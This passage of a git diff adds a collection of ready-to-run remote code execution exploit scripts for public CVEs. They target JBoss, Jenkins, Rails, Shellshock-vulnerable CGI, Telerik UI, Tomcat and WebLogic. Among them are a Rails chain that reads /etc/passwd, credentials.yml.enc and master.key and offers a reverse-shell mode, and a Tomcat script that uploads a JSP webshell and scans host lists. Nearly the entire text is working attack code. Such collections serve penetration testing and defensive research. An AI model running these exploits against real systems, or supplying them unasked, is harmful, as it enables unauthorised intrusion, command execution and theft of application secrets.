for i in range(0,opts.num):
|
||||
check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
|
@ -0,0 +1,62 @@
|
|||
#! /usr/bin/env python2
|
||||
|
||||
# Jboss Java Deserialization RCE (CVE-2015-7501)
|
||||
# Made with <3 by @byt3bl33d3r
|
||||
|
||||
from __future__ import print_function
|
||||
import requests
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
import argparse
|
||||
import sys, os
|
||||
#from binascii import hexlify, unhexlify
|
||||
from subprocess import check_output
|
||||
|
||||
ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
|
||||
ysoserial_path = None
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument('target', type=str, help='Target IP')
|
||||
parser.add_argument('command', type=str, help='Command to run on target')
|
||||
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
|
||||
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if not args.ysoserial_path:
|
||||
for path in ysoserial_default_paths:
|
||||
if os.path.exists(path):
|
||||
ysoserial_path = path
|
||||
else:
|
||||
if os.path.exists(args.ysoserial_path):
|
||||
ysoserial_path = args.ysoserial_path
|
||||
|
||||
if ysoserial_path is None:
|
||||
print('[-] Could not find ysoserial JAR file')
|
||||
sys.exit(1)
|
||||
|
||||
if len(args.target.split(":")) != 2:
|
||||
print('[-] Target must be in format IP:PORT')
|
||||
sys.exit(1)
|
||||
|
||||
if not args.command:
|
||||
print('[-] You must specify a command to run')
|
||||
sys.exit(1)
|
||||
|
||||
ip, port = args.target.split(':')
|
||||
|
||||
print('[*] Target IP: {}'.format(ip))
|
||||
print('[*] Target PORT: {}'.format(port))
|
||||
|
||||
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
|
||||
|
||||
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
|
||||
|
||||
if r.status_code == 200:
|
||||
print('[+] Command executed successfully')
|
||||
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,84 @@
|
|||
#! /usr/bin/env python2
|
||||
|
||||
#Jenkins Groovy XML RCE (CVE-2016-0792)
|
||||
#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
|
||||
#Made with <3 by @byt3bl33d3r
|
||||
|
||||
from __future__ import print_function
|
||||
import requests
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
import argparse
|
||||
import sys
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument('target', type=str, help='Target IP:PORT')
|
||||
parser.add_argument('command', type=str, help='Command to run on target')
|
||||
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if len(args.target.split(':')) != 2:
|
||||
print('[-] Target must be in format IP:PORT')
|
||||
sys.exit(1)
|
||||
|
||||
if not args.command:
|
||||
print('[-] You must specify a command to run')
|
||||
sys.exit(1)
|
||||
|
||||
ip, port = args.target.split(':')
|
||||
|
||||
print('[*] Target IP: {}'.format(ip))
|
||||
print('[*] Target PORT: {}'.format(port))
|
||||
|
||||
xml_formatted = ''
|
||||
command_list = args.command.split()
|
||||
for cmd in command_list:
|
||||
xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
|
||||
|
||||
xml_payload = '''<map>
|
||||
<entry>
|
||||
<groovy.util.Expando>
|
||||
<expandoProperties>
|
||||
<entry>
|
||||
<string>hashCode</string>
|
||||
<org.codehaus.groovy.runtime.MethodClosure>
|
||||
<delegate class="groovy.util.Expando" reference="../../../.."/>
|
||||
<owner class="java.lang.ProcessBuilder">
|
||||
<command>
|
||||
{}
|
||||
</command>
|
||||
<redirectErrorStream>false</redirectErrorStream>
|
||||
</owner>
|
||||
<resolveStrategy>0</resolveStrategy>
|
||||
<directive>0</directive>
|
||||
<parameterTypes/>
|
||||
<maximumNumberOfParameters>0</maximumNumberOfParameters>
|
||||
<method>start</method>
|
||||
</org.codehaus.groovy.runtime.MethodClosure>
|
||||
</entry>
|
||||
</expandoProperties>
|
||||
</groovy.util.Expando>
|
||||
<int>1</int>
|
||||
</entry>
|
||||
</map>'''.format(xml_formatted.strip())
|
||||
|
||||
print('[*] Generated XML payload:')
|
||||
print(xml_payload)
|
||||
print()
|
||||
|
||||
print('[*] Sending payload')
|
||||
headers = {'Content-Type': 'text/xml'}
|
||||
r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
|
||||
|
||||
paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
|
||||
if r.status_code == 500:
|
||||
for path in paths_in_trace:
|
||||
if path in r.text:
|
||||
print('[+] Command executed successfully')
|
||||
break
|
|
@ -0,0 +1,32 @@
|
|||
#!/usr/bin/env python
|
||||
# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
|
||||
# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
|
||||
from __future__ import print_function
|
||||
from builtins import input
|
||||
import requests
|
||||
import sys
|
||||
|
||||
print("""
|
||||
Jenkins Groovy Console cmd runner.
|
||||
|
||||
usage: ./jgc.py [HOST]
|
||||
|
||||
Then type any command and wait for STDOUT output from remote machine.
|
||||
Type 'exit' to exit :)
|
||||
""")
|
||||
URL = sys.argv[1] + '/scriptText'
|
||||
HEADERS = {
|
||||
'User-Agent': 'jgc'
|
||||
}
|
||||
|
||||
while 1:
|
||||
CMD = input(">> Enter command to execute (or type 'exit' to exit): ")
|
||||
if CMD == 'exit':
|
||||
print("exiting...\n")
|
||||
exit(0)
|
||||
|
||||
DATA = {
|
||||
'script': 'println "{}".execute().text'.format(CMD)
|
||||
}
|
||||
result = requests.post(URL, headers=HEADERS, data=DATA)
|
||||
print(result.text)
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,156 @@
|
|||
require 'erb'
|
||||
require "./demo-5.2.1/config/environment"
|
||||
require "base64"
|
||||
require 'net/http'
|
||||
|
||||
$proxy_addr = '127.0.0.1'
|
||||
$proxy_port = 8080
|
||||
|
||||
$remote = "http://172.18.0.3:3000"
|
||||
$ressource = "/demo"
|
||||
|
||||
puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n"
|
||||
|
||||
print "[+] Checking if vulnerable to CVE-2019-5418 => "
|
||||
uri = URI($remote + $ressource)
|
||||
req = Net::HTTP::Get.new(uri)
|
||||
req['Accept'] = "../../../../../../../../../../etc/passwd{{"
|
||||
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
|
||||
http.request(req)
|
||||
}
|
||||
if res.body.include? "root:x:0:0:root:"
|
||||
puts "\033[92mOK\033[0m"
|
||||
else
|
||||
puts "KO"
|
||||
abort
|
||||
end
|
||||
|
||||
print "[+] Getting file => credentials.yml.enc => "
|
||||
path = "../../../../../../../../../../config/credentials.yml.enc{{"
|
||||
for $i in 0..9
|
||||
uri = URI($remote + $ressource)
|
||||
req = Net::HTTP::Get.new(uri)
|
||||
req['Accept'] = path[3..57]
|
||||
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
|
||||
http.request(req)
|
||||
}
|
||||
if res.code == "200"
|
||||
puts "\033[92mOK\033[0m"
|
||||
File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) }
|
||||
break
|
||||
end
|
||||
path = path[3..57]
|
||||
$i +=1;
|
||||
end
|
||||
|
||||
print "[+] Getting file => master.key => "
|
||||
path = "../../../../../../../../../../config/master.key{{"
|
||||
for $i in 0..9
|
||||
uri = URI($remote + $ressource)
|
||||
req = Net::HTTP::Get.new(uri)
|
||||
req['Accept'] = path[3..57]
|
||||
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
|
||||
http.request(req)
|
||||
}
|
||||
if res.code == "200"
|
||||
puts "\033[92mOK\033[0m"
|
||||
File.open("master.key", 'w') { |file| file.write(res.body) }
|
||||
break
|
||||
end
|
||||
path = path[3..57]
|
||||
$i +=1;
|
||||
end
|
||||
|
||||
print "[+] Decrypt secret_key_base => "
|
||||
credentials_config_path = File.join("../", "credentials.yml.enc")
|
||||
credentials_key_path = File.join("../", "master.key")
|
||||
ENV["RAILS_MASTER_KEY"] = res.body
|
||||
credentials = ActiveSupport::EncryptedConfiguration.new(
|
||||
config_path: Rails.root.join(credentials_config_path),
|
||||
key_path: Rails.root.join(credentials_key_path),
|
||||
env_key: "RAILS_MASTER_KEY",
|
||||
raise_if_missing_key: true
|
||||
)
|
||||
if credentials.secret_key_base != nil
|
||||
puts "\033[92mOK\033[0m"
|
||||
puts ""
|
||||
puts "secret_key_base": credentials.secret_key_base
|
||||
puts ""
|
||||
end
|
||||
|
||||
puts "[+] Getting reflective command (R) or reverse shell (S) => "
|
||||
loop do
|
||||
begin
|
||||
input = [(print 'Select option R or S: '), gets.rstrip][1]
|
||||
if input == "R"
|
||||
puts "Reflective command selected"
|
||||
command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1]
|
||||
elsif input == "S"
|
||||
puts "Reverse shell selected"
|
||||
command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1]
|
||||
else
|
||||
puts "No option selected"
|
||||
abort
|
||||
end
|
||||
|
||||
command_b64 = Base64.encode64(command)
|
||||
|
||||
print "[+] Generating payload CVE-2019-5420 => "
|
||||
secret_key_base = credentials.secret_key_base
|
||||
key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
|
||||
secret = key_generator.generate_key("ActiveStorage")
|
||||
verifier = ActiveSupport::MessageVerifier.new(secret)
|
||||
if input == "R"
|
||||
code = "system('bash','-c','" + command + " > /tmp/result.txt')"
|
||||
else
|
||||
code = "system('bash','-c','" + command + "')"
|
||||
end
|
||||
erb = ERB.allocate
|
||||
erb.instance_variable_set :@src, code
|
||||
erb.instance_variable_set :@filename, "1"
|
||||
erb.instance_variable_set :@lineno, 1
|
||||
dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
|
||||
|
||||
puts "\033[92mOK\033[0m"
|
||||
puts ""
|
||||
url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test"
|
||||
puts url
|
||||
puts ""
|
||||
|
||||
print "[+] Sending request => "
|
||||
uri = URI(url)
|
||||
req = Net::HTTP::Get.new(uri)
|
||||
req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
|
||||
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
|
||||
http.request(req)
|
||||
}
|
||||
if res.code == "500"
|
||||
puts "\033[92mOK\033[0m"
|
||||
else
|
||||
puts "KO"
|
||||
abort
|
||||
end
|
||||
|
||||
if input == "R"
|
||||
print "[+] Getting result of command => "
|
||||
uri = URI($remote + $ressource)
|
||||
req = Net::HTTP::Get.new(uri)
|
||||
req['Accept'] = "../../../../../../../../../../tmp/result.txt{{"
|
||||
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
|
||||
http.request(req)
|
||||
}
|
||||
if res.code == "200"
|
||||
puts "\033[92mOK\033[0m\n\n"
|
||||
puts res.body
|
||||
puts "\n"
|
||||
else
|
||||
puts "KO"
|
||||
abort
|
||||
end
|
||||
end
|
||||
|
||||
rescue Exception => e
|
||||
puts "Exiting..."
|
||||
abort
|
||||
end
|
||||
end
|
|
@ -0,0 +1,36 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
# Successful Output:
|
||||
# # python shell_shocker.py <VulnURL>
|
||||
# [+] Attempting Shell_Shock - Make sure to type full path
|
||||
# ~$ /bin/ls /
|
||||
# bin
|
||||
# boot
|
||||
# dev
|
||||
# etc
|
||||
# ..
|
||||
# ~$ /bin/cat /etc/passwd
|
||||
|
||||
from __future__ import print_function
|
||||
from future import standard_library
|
||||
standard_library.install_aliases()
|
||||
from builtins import input
|
||||
import sys, urllib.request, urllib.error, urllib.parse
|
||||
|
||||
if len(sys.argv) != 2:
|
||||
print("Usage: shell_shocker <URL>")
|
||||
sys.exit(0)
|
||||
|
||||
URL=sys.argv[1]
|
||||
print("[+] Attempting Shell_Shock - Make sure to type full path")
|
||||
|
||||
while True:
|
||||
command=input("~$ ")
|
||||
opener=urllib.request.build_opener()
|
||||
opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
|
||||
try:
|
||||
response=opener.open(URL)
|
||||
for line in response.readlines():
|
||||
print(line.strip())
|
||||
except Exception as e: print(e)
|
||||
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,140 @@
|
|||
#!/usr/bin/env python3
|
||||
# origin : https://github.com/noperator/CVE-2019-18935
|
||||
# INSTALL:
|
||||
# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
|
||||
# python3 -m venv env
|
||||
# source env/bin/activate
|
||||
# pip3 install -r requirements.txt
|
||||
|
||||
# Import encryption routines.
|
||||
from sys import path
|
||||
path.insert(1, 'RAU_crypto')
|
||||
from RAU_crypto import RAUCipher
|
||||
|
||||
from argparse import ArgumentParser
|
||||
from json import dumps, loads
|
||||
from os.path import basename, splitext
|
||||
from pprint import pprint
|
||||
from requests import post
|
||||
from requests.packages.urllib3 import disable_warnings
|
||||
from sys import stderr
|
||||
from time import time
|
||||
from urllib3.exceptions import InsecureRequestWarning
|
||||
|
||||
disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
def send_request(files):
|
||||
headers = {
|
||||
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0',
|
||||
'Connection': 'close',
|
||||
'Accept-Language': 'en-US,en;q=0.5',
|
||||
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
'Upgrade-Insecure-Requests': '1'
|
||||
}
|
||||
response = post(url, files=files, verify=False, headers=headers)
|
||||
try:
|
||||
result = loads(response.text)
|
||||
result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))
|
||||
pprint(result)
|
||||
except:
|
||||
print(response.text)
|
||||
|
||||
def build_raupostdata(object, type):
|
||||
return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type)
|
||||
|
||||
def upload():
|
||||
|
||||
# Build rauPostData.
|
||||
object = {
|
||||
'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
|
||||
'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version),
|
||||
'MaxFileSize': 0,
|
||||
'TimeToLive': { # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk.
|
||||
'Ticks': 1440000000000,
|
||||
'Days': 0,
|
||||
'Hours': 40,
|
||||
'Minutes': 0,
|
||||
'Seconds': 0,
|
||||
'Milliseconds': 0,
|
||||
'TotalDays': 1.6666666666666666,
|
||||
'TotalHours': 40,
|
||||
'TotalMinutes': 2400,
|
||||
'TotalSeconds': 144000,
|
||||
'TotalMilliseconds': 144000000
|
||||
},
|
||||
'UseApplicationPoolImpersonation': False
|
||||
}
|
||||
type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
|
||||
raupostdata = build_raupostdata(object, type)
|
||||
|
||||
with open(filename_local, 'rb') as f:
|
||||
payload = f.read()
|
||||
|
||||
metadata = {
|
||||
'TotalChunks': 1,
|
||||
'ChunkIndex': 0,
|
||||
'TotalFileSize': 1,
|
||||
'UploadID': filename_remote # Determines remote filename on disk.
|
||||
}
|
||||
|
||||
# Build multipart form data.
|
||||
files = {
|
||||
'rauPostData': (None, raupostdata),
|
||||
'file': (filename_remote, payload, 'application/octet-stream'),
|
||||
'fileName': (None, filename_remote),
|
||||
'contentType': (None, 'application/octet-stream'),
|
||||
'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
|
||||
'metadata': (None, dumps(metadata))
|
||||
}
|
||||
|
||||
# Send request.
|
||||
print('[*] Local payload name: ', filename_local, file=stderr)
|
||||
print('[*] Destination folder: ', temp_target_folder, file=stderr)
|
||||
print('[*] Remote payload name:', filename_remote, file=stderr)
|
||||
print(file=stderr)
|
||||
send_request(files)
|
||||
|
||||
def deserialize():
|
||||
|
||||
# Build rauPostData.
|
||||
object = {
|
||||
'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote
|
||||
}
|
||||
type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'
|
||||
raupostdata = build_raupostdata(object, type)
|
||||
|
||||
# Build multipart form data.
|
||||
files = {
|
||||
'rauPostData': (None, raupostdata), # Only need this now.
|
||||
'': '' # One extra input is required for the page to process the request.
|
||||
}
|
||||
|
||||
# Send request.
|
||||
print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr)
|
||||
start = time()
|
||||
send_request(files)
|
||||
end = time()
|
||||
print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr)
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.')
|
||||
parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln")
|
||||
parser.add_argument('-v', dest='ui_version', required=True, help='software version')
|
||||
parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version')
|
||||
parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL')
|
||||
parser.add_argument('-f', dest='folder', required=True, help='destination folder on target')
|
||||
parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau')
|
||||
args = parser.parse_args()
|
||||
|
||||
temp_target_folder = args.folder.replace('/', '\\')
|
||||
ui_version = args.ui_version
|
||||
net_version = args.net_version
|
||||
filename_local = args.payload
|
||||
filename_remote = str(time()) + splitext(basename(filename_local))[1]
|
||||
url = args.url
|
||||
|
||||
upload()
|
||||
|
||||
if not args.test_upload:
|
||||
deserialize()
|
||||
|
|
@ -0,0 +1,239 @@
|
|||
#!/usr/bin/python
|
||||
# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py
|
||||
"""
|
||||
./cve-2017-12617.py [options]
|
||||
|
||||
|
||||
options:
|
||||
|
||||
|
||||
-u ,--url [::] check target url if it's vulnerable
|
||||
-p,--pwn [::] generate webshell and upload it
|
||||
-l,--list [::] hosts list
|
||||
|
||||
|
||||
[+]usage:
|
||||
|
||||
|
||||
./cve-2017-12617.py -u http://127.0.0.1
|
||||
./cve-2017-12617.py --url http://127.0.0.1
|
||||
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
|
||||
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
|
||||
./cve-2017-12617.py -l hotsts.txt
|
||||
./cve-2017-12617.py --list hosts.txt
|
||||
"""
|
||||
from __future__ import print_function
|
||||
from builtins import input
|
||||
from builtins import str
|
||||
from builtins import object
|
||||
import requests
|
||||
import re
|
||||
import signal
|
||||
from optparse import OptionParser
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
class bcolors(object):
|
||||
HEADER = '\033[95m'
|
||||
OKBLUE = '\033[94m'
|
||||
OKGREEN = '\033[92m'
|
||||
WARNING = '\033[93m'
|
||||
FAIL = '\033[91m'
|
||||
ENDC = '\033[0m'
|
||||
BOLD = '\033[1m'
|
||||
UNDERLINE = '\033[4m'
|
||||
|
||||
|
||||
|
||||
|
||||
banner="""
|
||||
|
||||
|
||||
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
|
||||
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
|
||||
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
|
||||
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
|
||||
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
|
||||
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
|
||||
|
||||
|
||||
|
||||
[@intx0x80]
|
||||
|
||||
"""
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
def signal_handler(signal, frame):
|
||||
|
||||
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
|
||||
|
||||
exit()
|
||||
|
||||
signal.signal(signal.SIGINT, signal_handler)
|
||||
|
||||
|
||||
|
||||
|
||||
def removetags(tags):
|
||||
remove = re.compile('<.*?>')
|
||||
txt = re.sub(remove, '\n', tags)
|
||||
return txt.replace("\n\n\n","\n")
|
||||
|
||||
|
||||
def getContent(url,f):
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||
re=requests.get(str(url)+"/"+str(f), headers=headers)
|
||||
return re.content
|
||||
|
||||
def createPayload(url,f):
|
||||
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
|
||||
if req.status_code==201:
|
||||
print("File Created ..")
|
||||
|
||||
|
||||
def RCE(url,f):
|
||||
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
|
||||
<INPUT name='cmd' type=text>
|
||||
<INPUT type=submit value='Run'>
|
||||
</FORM>
|
||||
<%@ page import="java.io.*" %>
|
||||
<%
|
||||
String cmd = request.getParameter("cmd");
|
||||
String output = "";
|
||||
if(cmd != null) {
|
||||
String s = null;
|
||||
try {
|
||||
Process p = Runtime.getRuntime().exec(cmd,null,null);
|
||||
BufferedReader sI = new BufferedReader(new
|
||||
InputStreamReader(p.getInputStream()));
|
||||
while((s = sI.readLine()) != null) { output += s+"</br>"; }
|
||||
} catch(IOException e) { e.printStackTrace(); }
|
||||
}
|
||||
%>
|
||||
<pre><%=output %></pre>"""
|
||||
|
||||
|
||||
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||
|
||||
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
|
||||
|
||||
|
||||
|
||||
def shell(url,f):
|
||||
|
||||
while True:
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||
cmd=input("$ ")
|
||||
payload={'cmd':cmd}
|
||||
if cmd=="q" or cmd=="Q":
|
||||
break
|
||||
|
||||
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
|
||||
re=str(re.content)
|
||||
t=removetags(re)
|
||||
print(t)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#print bcolors.HEADER+ banner+bcolors.ENDC
|
||||
|
||||
parse=OptionParser(
|
||||
|
||||
|
||||
bcolors.HEADER+"""
|
||||
|
||||
|
||||
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
|
||||
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
|
||||
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
|
||||
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
|
||||
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
|
||||
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
|
||||
|
||||
|
||||
|
||||
|
||||
./cve-2017-12617.py [options]
|
||||
|
||||
options:
|
||||
|
||||
-u ,--url [::] check target url if it's vulnerable
|
||||
-p,--pwn [::] generate webshell and upload it
|
||||
-l,--list [::] hosts list
|
||||
|
||||
[+]usage:
|
||||
|
||||
./cve-2017-12617.py -u http://127.0.0.1
|
||||
./cve-2017-12617.py --url http://127.0.0.1
|
||||
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
|
||||
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
|
||||
./cve-2017-12617.py -l hotsts.txt
|
||||
./cve-2017-12617.py --list hosts.txt
|
||||
|
||||
|
||||
[@intx0x80]
|
||||
|
||||
"""+bcolors.ENDC
|
||||
|
||||
)
|
||||
|
||||
|
||||
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
|
||||
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
|
||||
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
|
||||
|
||||
(opt,args)=parse.parse_args()
|
||||
|
||||
if opt.U==None and opt.P==None and opt.L==None:
|
||||
print(parse.usage)
|
||||
exit(0)
|
||||
|
||||
|
||||
|
||||
else:
|
||||
if opt.U!=None and opt.P==None and opt.L==None:
|
||||
print(bcolors.OKGREEN+banner+bcolors.ENDC)
|
||||
url=str(opt.U)
|
||||
checker="Poc.jsp"
|
||||
print(bcolors.BOLD +"Poc Filename {}".format(checker))
|
||||
createPayload(str(url)+"/",checker)
|
||||
con=getContent(str(url)+"/",checker)
|
||||
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
|
||||
print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
|
||||
print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
|
||||
|
||||
else:
|
||||
print('Not Vulnerable to CVE-2017-12617 ')
|
||||
elif opt.P!=None and opt.U!=None and opt.L==None:
|
||||
print(bcolors.OKGREEN+banner+bcolors.ENDC)
|
||||
pwn=str(opt.P)
|
||||
url=str(opt.U)
|
||||
print("Uploading Webshell .....")
|
||||
pwn=pwn+".jsp"
|
||||
RCE(str(url)+"/",pwn)
|
||||
shell(str(url),pwn)
|
||||
elif opt.L!=None and opt.P==None and opt.U==None:
|
||||
print(bcolors.OKGREEN+banner+bcolors.ENDC)
|
||||
w=str(opt.L)
|
||||
f=open(w,"r")
|
||||
print("Scaning hosts in {}".format(w))
|
||||
checker="Poc.jsp"
|
||||
for i in f.readlines():
|
||||
i=i.strip("\n")
|
||||
createPayload(str(i)+"/",checker)
|
||||
con=getContent(str(i)+"/",checker)
|
||||
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
|
||||
print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,63 @@
|
|||
from __future__ import print_function
|
||||
from builtins import input
|
||||
import requests
|
||||
import sys
|
||||
|
||||
url_in = sys.argv[1]
|
||||
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
|
||||
payload_header = {'content-type': 'text/xml'}
|
||||
|
||||
|
||||
def payload_command (command_in):
|
||||
html_escape_table = {
|
||||
"&": "&",
|
||||
'"': """,
|
||||
"'": "'",
|
||||
">": ">",
|
||||
"<": "<",
|
||||
}
|
||||
command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
|
||||
payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
|
||||
" <soapenv:Header> " \
|
||||
" <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
|
||||
" <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
|
||||
" <void class=\"java.lang.ProcessBuilder\"> \n" \
|
||||
" <array class=\"java.lang.String\" length=\"3\">" \
|
||||
" <void index = \"0\"> " \
|
||||
" <string>cmd</string> " \
|
||||
" </void> " \
|
||||
" <void index = \"1\"> " \
|
||||
" <string>/c</string> " \
|
||||
" </void> " \
|
||||
" <void index = \"2\"> " \
|
||||
+ command_filtered + \
|
||||
" </void> " \
|
||||
" </array>" \
|
||||
" <void method=\"start\"/>" \
|
||||
" </void>" \
|
||||
" </java>" \
|
||||
" </work:WorkContext>" \
|
||||
" </soapenv:Header>" \
|
||||
" <soapenv:Body/>" \
|
||||
"</soapenv:Envelope>"
|
||||
return payload_1
|
||||
|
||||
def do_post(command_in):
|
||||
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
|
||||
|
||||
if result.status_code == 500:
|
||||
print("Command Executed \n")
|
||||
else:
|
||||
print("Something Went Wrong \n")
|
||||
|
||||
|
||||
|
||||
print("***************************************************** \n" \
|
||||
"**************** Coded By 1337g ****************** \n" \
|
||||
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
|
||||
"***************************************************** \n")
|
||||
|
||||
while 1:
|
||||
